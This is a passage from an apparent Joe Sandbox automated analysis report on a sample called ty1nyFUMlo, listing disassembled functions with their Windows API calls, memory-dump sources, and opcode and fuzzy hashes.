                                                                                                                        • Opcode Fuzzy Hash: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
                                                                                                                        • Instruction Fuzzy Hash: EE11EB3168930BBBA7119B54AC82CEA7F9CFF15754B10442FF608A6282D7707D417665
                                                                                                                        Function 00567439 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00567452
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00567469
                                                                                                                        • GetWindowDC.USER32(?), ref: 00567475
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00567484
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00567496
                                                                                                                        • GetSysColor.USER32(00000005), ref: 005674B0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 272304278-2594219639
                                                                                                                        • Opcode ID: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
                                                                                                                        • Instruction ID: d1812f9935a0adfe8a119fd6e5cfcef09dae11d2db8d67be07d1dd61e9215de1
                                                                                                                        • Opcode Fuzzy Hash: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
                                                                                                                        • Instruction Fuzzy Hash: 71018B31400219EFDB109F64DD08BAA7FB5FF19312F1004A0FA16A31A0CF311E45EB50
                                                                                                                        Function 0057ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 952045576-0
                                                                                                                        • Opcode ID: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
                                                                                                                        • Instruction ID: fd9260e992b1fcecdb2533b2e0b1c8fb117d3ad969f22688c65896332eea0067
                                                                                                                        • Opcode Fuzzy Hash: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
                                                                                                                        • Instruction Fuzzy Hash: 80418466C1021975CB11EBB4988EACF7BBCBF89710F508466F518E3122FB34E255C7A5
                                                                                                                        Function 0052F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0052F953
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F3D1
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F454
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
                                                                                                                        • Instruction ID: 07321a2e70d98a1bac38aea76dd3c6b95a3245066138fbfcc962061d945a9381
                                                                                                                        • Opcode Fuzzy Hash: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
                                                                                                                        • Instruction Fuzzy Hash: FB410B31608690BAC7398B2DF88872A7FB1BF97314F14483CE087576E1D631A8C4DB11
                                                                                                                        Function 00575622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
                                                                                                                        • Instruction ID: ce476ce3a50280507b72a00b44a597f3a5bb3df3f37a3004d0808bb695d88dfd
                                                                                                                        • Opcode Fuzzy Hash: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
                                                                                                                        • Instruction Fuzzy Hash: 82212961644E0A77D2185521AD96FFE3F5CFF61394F448420FD0E9A581FBA0EE1092E9
                                                                                                                        Function 00594FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        • API String ID: 0-572801152
                                                                                                                        • Opcode ID: 40fe074d7c96079ec33c2b19fe254e8f9c9c7c35940ae0b13f3c50b0ed85bb09
                                                                                                                        • Instruction ID: 4994603213440e1249d98e5c545af81e94d688fc66b64a5b5c8d9e703bc23fe2
                                                                                                                        • Opcode Fuzzy Hash: 40fe074d7c96079ec33c2b19fe254e8f9c9c7c35940ae0b13f3c50b0ed85bb09
                                                                                                                        • Instruction Fuzzy Hash: A9D1E271A0060AAFDF11CFA8C885FAEBBB5FF48344F148469E915AB281E770DD55CB90
                                                                                                                        Function 00551522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,005517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 005515CE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551651
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,005517FB,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516E4
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516FB
                                                                                                                          • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551777
                                                                                                                        • __freea.LIBCMT ref: 005517A2
                                                                                                                        • __freea.LIBCMT ref: 005517AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2829977744-0
                                                                                                                        • Opcode ID: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
                                                                                                                        • Instruction ID: c04c13829556676bdde93f596624673d63ad07e03a4ba3af2b3dd2827bf6d391
                                                                                                                        • Opcode Fuzzy Hash: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
                                                                                                                        • Instruction Fuzzy Hash: 9D91C671E10A165ADB208E78C8A5BEE7FB5FF49315F18055AEC02E7141EB35DC48CB68
                                                                                                                        Function 00594523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                        • Opcode ID: 12d10ab3524c7838255f63b06f75f76252958286bd28974099c1cbd6ba9c7582
                                                                                                                        • Instruction ID: 41213f7b4867b2642b7d579067c4a1d108a3a7272f84ede0c31922d5a4a1301b
                                                                                                                        • Opcode Fuzzy Hash: 12d10ab3524c7838255f63b06f75f76252958286bd28974099c1cbd6ba9c7582
                                                                                                                        • Instruction Fuzzy Hash: B5917E71A00219ABDF24CFA4D848FAEBFB8FF46715F108559E505AB280D7709D46CFA0
                                                                                                                        Function 00581187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0058125C
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00581284
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005812A8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005812D8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0058135F
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005813C4
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00581430
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2550207440-0
                                                                                                                        • Opcode ID: 5c9cb018e9d8491b73c1574922b4d2cbb676ebc4246377132d74a44afbee006d
                                                                                                                        • Instruction ID: de43210863cf6dd09675dc264b1f14575ccda69dbb8db402c8801cd81d3bf2c4
                                                                                                                        • Opcode Fuzzy Hash: 5c9cb018e9d8491b73c1574922b4d2cbb676ebc4246377132d74a44afbee006d
                                                                                                                        • Instruction Fuzzy Hash: 7F91E175A006199FDB00EF94C889BBEBFB9FF85311F104429E901FB291D774A946CB98
                                                                                                                        Function 0052948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: 83f3c22fb306f6be88ca3d7481be7fa10cefbf19928e3787af2bff1dfcc73a85
                                                                                                                        • Instruction ID: 3cb3b983fbfa0f9e69b899443e4a6e3a1e498c1d3afaa14e7ea96eee4cdfe8c9
                                                                                                                        • Opcode Fuzzy Hash: 83f3c22fb306f6be88ca3d7481be7fa10cefbf19928e3787af2bff1dfcc73a85
                                                                                                                        • Instruction Fuzzy Hash: 46910671E00219AFCB14CFA9D888AEEBFB8FF4A320F144555E515B7291D774A941CBA0
                                                                                                                        Function 00593947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0059396B
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00593A7A
                                                                                                                        • _wcslen.LIBCMT ref: 00593A8A
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00593C1F
                                                                                                                          • Part of subcall function 00580CDF: VariantInit.OLEAUT32(00000000), ref: 00580D1F
                                                                                                                          • Part of subcall function 00580CDF: VariantCopy.OLEAUT32(?,?), ref: 00580D28
                                                                                                                          • Part of subcall function 00580CDF: VariantClear.OLEAUT32(?), ref: 00580D34
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                        • Opcode ID: e25df81d22aadba8a4151272476a2abb24ea923471b52510eb951dd355fa9c0d
                                                                                                                        • Instruction ID: dc642ee4a540e05f302883e646ca5ec0a6347dd7f755bcea8d9dc74af3d1ce25
                                                                                                                        • Opcode Fuzzy Hash: e25df81d22aadba8a4151272476a2abb24ea923471b52510eb951dd355fa9c0d
                                                                                                                        • Instruction Fuzzy Hash: 769136756083069FCB10EF28C49596ABBE5FF89314F14882DF88997351DB30EE45CB92
                                                                                                                        Function 00594BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
                                                                                                                          • Part of subcall function 0057000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
                                                                                                                          • Part of subcall function 0057000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
                                                                                                                          • Part of subcall function 0057000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00594C51
                                                                                                                        • _wcslen.LIBCMT ref: 00594D59
                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00594DCF
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00594DDA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                        • Opcode ID: 0d877d0f5680bbfd8bc4b1a12b15a4521c267de10851dd49e1813de6f20319c2
                                                                                                                        • Instruction ID: 60621b3f739e646e4d965c75ee284f12d03f14d315a975b55d033b0dbefe4138
                                                                                                                        • Opcode Fuzzy Hash: 0d877d0f5680bbfd8bc4b1a12b15a4521c267de10851dd49e1813de6f20319c2
                                                                                                                        • Instruction Fuzzy Hash: 80911671D0021AAFDF10DFA4D895EEEBBB8BF48310F108569E919A7241DB309E45CF60
                                                                                                                        Function 005A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 005A2183
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 005A21B5
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005A21DD
                                                                                                                        • _wcslen.LIBCMT ref: 005A2213
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 005A224D
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 005A225B
                                                                                                                          • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
                                                                                                                          • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
                                                                                                                          • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A22E3
                                                                                                                          • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4196846111-0
                                                                                                                        • Opcode ID: d1103c7409c4f174c96464404990f1c455a24cda7340d764c0329f9b5f4031aa
                                                                                                                        • Instruction ID: c20852dbd681ee844113cfb4df46e37ba3a5a5cefbeecbe0b2aa2c3e45403db4
                                                                                                                        • Opcode Fuzzy Hash: d1103c7409c4f174c96464404990f1c455a24cda7340d764c0329f9b5f4031aa
                                                                                                                        • Instruction Fuzzy Hash: 55714B75A00215AFCB10DF68C846AAEBFF5BF8A310F148469E916AB351DB34ED418B90
                                                                                                                        Function 0057AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 0057AEF9
                                                                                                                        • GetKeyboardState.USER32(?), ref: 0057AF0E
                                                                                                                        • SetKeyboardState.USER32(?), ref: 0057AF6F
                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057AF9D
                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0057AFBC
                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0057AFFD
                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0057B020
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 4f1173effa0c305a0a07e059feb70ada640a78b3b7c93d56ff0aa68b6667f26a
                                                                                                                        • Instruction ID: 7be483fbd37eb13ca928255f13004dd394cd7099eaf4d2ad01014ca44ad8056f
                                                                                                                        • Opcode Fuzzy Hash: 4f1173effa0c305a0a07e059feb70ada640a78b3b7c93d56ff0aa68b6667f26a
                                                                                                                        • Instruction Fuzzy Hash: 4351D1A06087D53DFB3682349C49BBEBEA96B46304F08C589E1DD958C3D398ACC8E751
                                                                                                                        Function 0057ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(00000000), ref: 0057AD19
                                                                                                                        • GetKeyboardState.USER32(?), ref: 0057AD2E
                                                                                                                        • SetKeyboardState.USER32(?), ref: 0057AD8F
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0057ADBB
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0057ADD8
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0057AE17
                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0057AE38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
